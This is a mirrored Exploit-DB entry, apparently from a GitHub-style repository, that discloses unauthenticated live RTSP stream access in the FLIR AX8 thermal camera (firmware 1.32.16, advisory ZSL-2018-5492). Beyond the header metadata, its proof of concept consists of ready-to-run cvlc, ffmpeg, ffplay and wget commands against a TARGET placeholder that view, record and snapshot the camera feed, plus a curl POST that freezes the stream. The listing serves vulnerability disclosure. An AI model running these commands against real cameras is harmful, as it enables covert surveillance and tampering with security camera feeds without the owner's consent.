bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/45606.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

24 lines
No EOL
968 B
Text
Raw Permalink Blame History

# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: https://www.flir.com
# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
# References:
# Advisory ID: ZSL-2018-5492
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
# live RTSP video stream access.
# PoC
$ cvlc rtsp://TARGET/mpeg4 --fullscreen
$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
$ ffplay rtsp://TARGET/mpeg4
$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
# PoC - To freeze the stream:
$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php
Reference in a new issue View git blame Copy permalink